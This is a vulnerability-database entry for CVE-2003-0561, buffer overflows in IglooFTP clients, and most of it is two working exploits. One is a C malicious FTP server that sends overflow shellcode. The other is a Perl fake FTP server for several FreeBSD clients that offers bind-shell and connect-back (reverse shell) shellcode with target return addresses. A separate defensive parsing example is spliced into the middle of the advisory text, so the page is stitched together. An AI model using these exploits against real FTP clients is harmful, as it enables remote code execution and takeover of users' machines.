CVE-2003-0561
CVSS 7.5
Published: 2003-08-18 00:00:00
Revised: 2016-10-17 22:35:23

[Original] Multiple buffer overflows in IglooFTP PRO 3.8 allow remote FTP servers to execute arbitrary code via (1) a long FTP banner, or long responses to the client commands (2) USER, (3) PASS, (4) ACCT, and possibly other commands.


[CNNVD] IglooFTP PRO Buffer Overflow Vulnerability (CNNVD-200308-081)

IglooFTP PRO 3.8 contains multiple buffer overflow vulnerabilities. A remote FTP server can execute arbitrary code via (1) an over-long FTP banner, or over-long responses to the client commands (2) USER, (3) PASS, (4) ACCT, and possibly other commands.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0561
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0561
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-081
(Official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0010.html
(UNKNOWN)  VULNWATCH  20030707 Multiple Buffer Overflows in IglooFTP PRO
http://marc.info/?l=bugtraq&m=105769805311484&w=2
(UNKNOWN)  BUGTRAQ  20030707 Multiple Buffer Overflows in IglooFTP PRO

- Vulnerability information

IglooFTP PRO Buffer Overflow Vulnerability
High risk  Buffer overflow
2003-08-18 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        

- Vulnerability information (22871)

IglooFTP PRO 3.8 Multiple Buffer Overflow Vulnerabilities (1) (EDBID:22871)
windows remote
2003-07-07 Verified
0 vkhoshain
source: http://www.securityfocus.com/bid/8117/info

IglooFTP PRO for Windows platforms has been reported prone to multiple buffer overrun vulnerabilities.

The issue likely presents itself due to a lack of sufficient bounds checking performed on data that is copied into a reserved internal memory buffer. Remote arbitrary code execution has been confirmed.

It should be noted that although this vulnerability has been reported to affect IglooFTP PRO version 3.8, other versions might also be affected.

/* IglooExploit.c (Windows XP Professional Build 2600.x)
*
* vkhoshain@hotmail.com
* ---------------------------
* glooFTP Pro 3.8 Remote exploit code is ready to use ;)
* all you need to do is compile the source code and then
* run the program and wait for glooFTP Pro 3.8 connection
*
* This one doesn't do anything , just run notepad.exe and then crash
* the program by :
* INT 3 ;)
*
*/

#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#pragma comment (lib,"ws2_32")

int main()
{
        char spend[1024];                 /* filler up to the saved return address */
        char shellcode[] =                /* 46 bytes: runs notepad, then INT 3 (see header) */
        "\x90\x90\x90\x90\x90\xEB\x13\x5F\x66\x31\xC0\x88\x47"
        "\x0E\x40\x50\x57\xB8\xC6\x84\xE6\x77\xFF\xD0\xCD\x03"
        "\xE8\xE8\xFF\xFF\xFF\x6E\x6F\x74\x65\x70\x61\x64\x20"
        "\x20\x20\x20\x20\x20\x20\x23";
        WSADATA wsaData;
        SOCKET s1, spt;
        struct sockaddr_in p;
        struct sockaddr_in emp;
        int len;

        /* the original sent this buffer uninitialised; its content is never executed */
        memset(spend, 'A', sizeof(spend));

// Startup ...
        WSAStartup(0x0101,&wsaData);

// Creating first socket!
        printf("Creating socket ...\n");
        if ((s1=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
                printf("Err in Creating socket\n");
                WSACleanup();
                return 0;
        }
        p.sin_port = htons(21);
        p.sin_family =AF_INET;
        p.sin_addr.s_addr = INADDR_ANY;

// Binding ---
        printf("Binding ...\n");
        if ((bind(s1,(struct sockaddr*) &p,sizeof(p)))==SOCKET_ERROR)
        {
                printf("Err in Bind ...\n");
                closesocket(s1);
                WSACleanup();
                return 0;
        }

        printf("going to start listening\n");
        if ((listen(s1,5))==SOCKET_ERROR)
        {
                printf("Err in listen method ..\n");
                closesocket(s1);
                WSACleanup();
                return 0;
        }

        len=sizeof(emp);

// ACCEPTING
        printf("Listening on port 21 , please wait for glooFTP(ver3.8) connection ...\n");
        spt=accept(s1,(struct sockaddr*)&emp,&len);
        if (spt==INVALID_SOCKET)
        {
                printf("Err in accept ..\n");
                closesocket(s1);
                WSACleanup();
                return 0;
        }
        printf("The ftp client has just connected ,please wait ...\n");

        send(spt,"200 ",4,0);                     // Sending "200 "
        send(spt,spend,1024,0);                   // to receive RET addr place
        send(spt,"\x79\xfc\xe9\x77",4,0);         // EIP Address (RET Addr)
        send(spt,shellcode,46,0);                 // Sending Shellcode
        send(spt,"\n",1,0);

        closesocket(s1);
        closesocket(spt);
        WSACleanup();
        printf("Shellcode has just sent , Done.\n");

        return 0;
}

- Vulnerability information (22872)

IglooFTP PRO 3.8 Multiple Buffer Overflow Vulnerabilities (2) (EDBID:22872)
windows remote
2003-07-07 Verified
0 Peter Winter-Smith
source: http://www.securityfocus.com/bid/8117/info

http://www.exploit-db.com/sploits/22872.zip		

- Vulnerability information (22891)

IglooFTP 0.6.1 Banner Parsing Buffer Overflow Vulnerability (EDBID:22891)
freebsd remote
2003-07-10 Verified
0 inv[at]dtors
source: http://www.securityfocus.com/bid/8161/info

A buffer overflow vulnerability has been reported in IglooFTP. The vulnerability occurs when IglooFTP is parsing 'Welcome' banner messages from remote FTP servers. When IglooFTP receives an FTP banner exceeding a certain length, it will trigger the overflow condition. This could allow for execution of malicious code in the context of the FTP client.
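The defect class named in both advisories above (an FTP client copying a server-controlled banner or command reply into a fixed buffer with no bounds check) beside a bounded parser, as an added example that is not part of the advisory or either exploit; FTP_LINE_MAX, parse_reply_unsafe and parse_reply_safe are assumed names, not IglooFTP's own code:

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define FTP_LINE_MAX 256   /* assumed size of the client's per-reply buffer */
/* The defect class behind CVE-2003-0561: a server-controlled reply line is
 * copied into a fixed stack buffer with no bound, so a banner or USER/PASS/ACCT
 * reply longer than the buffer overwrites the stack. Kept for contrast only. */
int parse_reply_unsafe(const char *line)
{
    char buf[FTP_LINE_MAX];
    strcpy(buf, line);            /* unbounded copy: the overflow */
    return atoi(buf);
}

/* Hardened form: check the length before copying, copy with an explicit
 * bound, and require "ddd " or "ddd-" before trusting the reply code.
 * Returns the 3-digit code, or -1 for an over-long or malformed line. */
int parse_reply_safe(const char *line, char *text, size_t textlen)
{
    size_t n = strlen(line);
    if (n >= FTP_LINE_MAX || n < 4)
        return -1;                /* over-long: reject, never copy */
    if (!isdigit((unsigned char)line[0]) || !isdigit((unsigned char)line[1]) ||
        !isdigit((unsigned char)line[2]) || (line[3] != ' ' && line[3] != '-'))
        return -1;
    if (n - 4 >= textlen) return -1;
    memcpy(text, line + 4, n - 4);
    text[n - 4] = '\0';
    return (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
}

/* Constructed inputs: an ordinary banner, and a reply shaped like the
 * exploit above ("200 " followed by 1024 bytes of filler). */
int demo_normal_banner(void)
{
    char text[FTP_LINE_MAX];
    int code = parse_reply_safe("220 FTP server ready.", text, sizeof text);
    return (code == 220 && strcmp(text, "FTP server ready.") == 0) ? code : -2;
}

int demo_oversized_reply(void)
{
    char hostile[4 + 1024 + 1], text[FTP_LINE_MAX];
    memcpy(hostile, "200 ", 4);
    memset(hostile + 4, 'A', 1024);
    hostile[4 + 1024] = '\0';
    return parse_reply_safe(hostile, text, sizeof text);   /* -1: rejected */
}
```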

#!/usr/bin/perl

# PoC exploit for iglooftp, cftp and moxftp for freebsd

# moxftp / mftp 2.2
# cftp 0.12
# Iglooftp 0.6.1

# Some of the code is fucked, the passive connection is a cheap hack and will not
# respawn, so the fake ftpd will have to be restarted... (only IglooFTP)
# Some RET adr's change, this can be fixed with gdb, look into it yourself..

# all the clients are from ports.. some may have been fixed, did this shit some 
# time ago..

# thanks to kokanin for help and advice
# code by inv[at]dtors

use IO::Socket;

sub convert_ret {
    my($ret) = @_;                 # 8 hex digits, e.g. "bfbfc560"
    my $new_ret = '';

    # emit the address little-endian: lowest byte first
    for (my $x = 6; $x >= 0; $x -= 2) {
	$new_ret .= chr hex substr($ret, $x, 2);
    }
    return $new_ret;
}

sub convert_ip {
    my($ip) = @_;
    my $new_ip = '';

    my @ip_tmp = split(/\./, $ip);

    for (my $x = 0; $x < 4; $x++) {
	$new_ip .= chr $ip_tmp[$x];   # one raw byte per dotted-quad octet
    }
    return $new_ip;
}

$server_port = 21;
$passive_server_port = 10324;

unless(@ARGV == 3 || @ARGV == 2) 
{ die 
"Usage ./DSR-ftp_clients.pl Shellcode Client Ip\n
\tShellcode:\t0 = Portbind
\t\t\t1 = Connect back\n
\tClient:\t\t0 = IglooFTP (FreeBSD 4.7)
\t\t\t1 = cftp (FreeBSD 4.7)
\t\t\t2 = Moxftp (FreeBSD 4.7)
\t\t\t3 = cftp (FreeBSD 5.0)
\t\t\t4 = IglooFTP (FreeBSD 5.0)
\t\t\t5 = Moxftp (FreeBSD 5.0)\n"
}

($shellcode_arg, $client_arg, $extra_arg) = @ARGV;

$user_ip = convert_ip($extra_arg);

@shellcode_list = (
    "Portbind,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80",
    "Connect Back,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68"."$user_ip"."\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80");

@client_list = (
    "IglooFTP - FreeBSD 4.7,188,0xbfbfc560,0",
    "cftp - FreeBSD 4.7,8192,0xbfbffb04,1,300",
    "mftp - FreeBSD 4.7,516,0xbfbff8e0,1,100",
    "cftp - FreeBSD 5.0,8196,0xbfbffa30,1,300",
    "IglooFTP - FreeBSD 5.0,212,0xbfbfc440,0",
    "mftp - FreeBSD 5.0,532,0xbfbff950,1,100");

@client_info = split(/,/,@client_list[$client_arg]);
@shellcode_info = split(/,/,@shellcode_list[$shellcode_arg]);

print "\tDSR-ftp_clients by inv\n
Setting up Service on Port: $server_port
Client: @client_info[0]
Using Shellcode: @shellcode_info[0]
Using Offset: @client_info[2]\n";

$shellcode = @shellcode_info[1];
$shellcode_length = length($shellcode);

$nop_count = @client_info[1] - $shellcode_length - 8;
$nops = "\x90"x$nop_count;

$ret_temp = @client_info[2];
$ret = substr($ret_temp,2,8);
$ret = convert_ret($ret);
$ret = "$ret"x2;

if(@client_info[3] eq "1") {
    $nops_x = "\x90"x@client_info[1];
    $nops_y = "\x90"x@client_info[4];
    $exploit_string = "$nops_x"."$ret"."$nops_y"."$shellcode";
}

if($client_arg == 0 or $client_arg == 4) {
	$exploit_string ="total 666
drwxr-xr-x	25 root wheel	1536 Jan 28 00:13 .
drwxr-xr-x	14 root wheel	 512 Jan 28 00:13 ..
-rwxr-xr-x	 2 inv	inv	 512 Jan 29 01:00 $nops$shellcode$ret";
}

$server = IO::Socket::INET->new(LocalPort => $server_port,
                                Type    => SOCK_STREAM,
                                Reuse   => 1,
                                Listen  => 10)
or die "Can't listen on $server_port : $!\n";

while ($client = $server->accept()) {
    
    if(@client_info[3] == 1) {
	print $client "220 $exploit_string\n";
    }
    
    if(@client_info[3] eq "0") {
	print $client "220 0xdeadcode\n";
	while($request !~ /QUIT/i) {
	    $request = <$client>;
	    last unless defined $request;   # client went away
	    print $request;
	    
	    if($request =~ /PASS/i) {
		print $client "230 User anonymous logged in.\n";
	    }
	    
	    if($request =~ /USER/i) {
		print $client "331 Password required for anonymous.\n";
	    }
	
	    if($request =~ /SYST/i) {
		print $client "215 UNIX Type: L8\n";
	    }
	
	    if($request =~ /REST/i) {
		print $client "350 Restarting.\n";
	    }
	
	    if($request =~ /TYPE/i) {
		    print $client "200 Type set to A.\n";
	    }
	    
	    if($request =~ /PWD/i or $request =~ /FEAT/i) {
		print $client "257 \"/usr/home/inv/\" is current directory.\n";
	    }
	
	    if($request =~ /PASV/i) {
		$passive_server = IO::Socket::INET->new(LocalPort => $passive_server_port,
					Type 	=> SOCK_STREAM,
					Reuse 	=> 1,
					Listen 	=> 10)
		or die "Can't open passive port";
		print $client "227 Entering Passive Mode (127,0,0,1,40,84)\n";
	    }
	    
	    if ($request =~ /LIST/i) {
		while($passive_client = $passive_server->accept()){
		    print $client "150 Starting transfer.\n";    
		    print $passive_client $exploit_string;
		    close $passive_client;
		    print $client "226 BANG YOU ARE DEAD!!!\n";
		}
	    }	
	
	}
    close $client;
    }
}

- Vulnerability information

10327
IglooFTP PRO Multiple Client Command Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-07-06 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete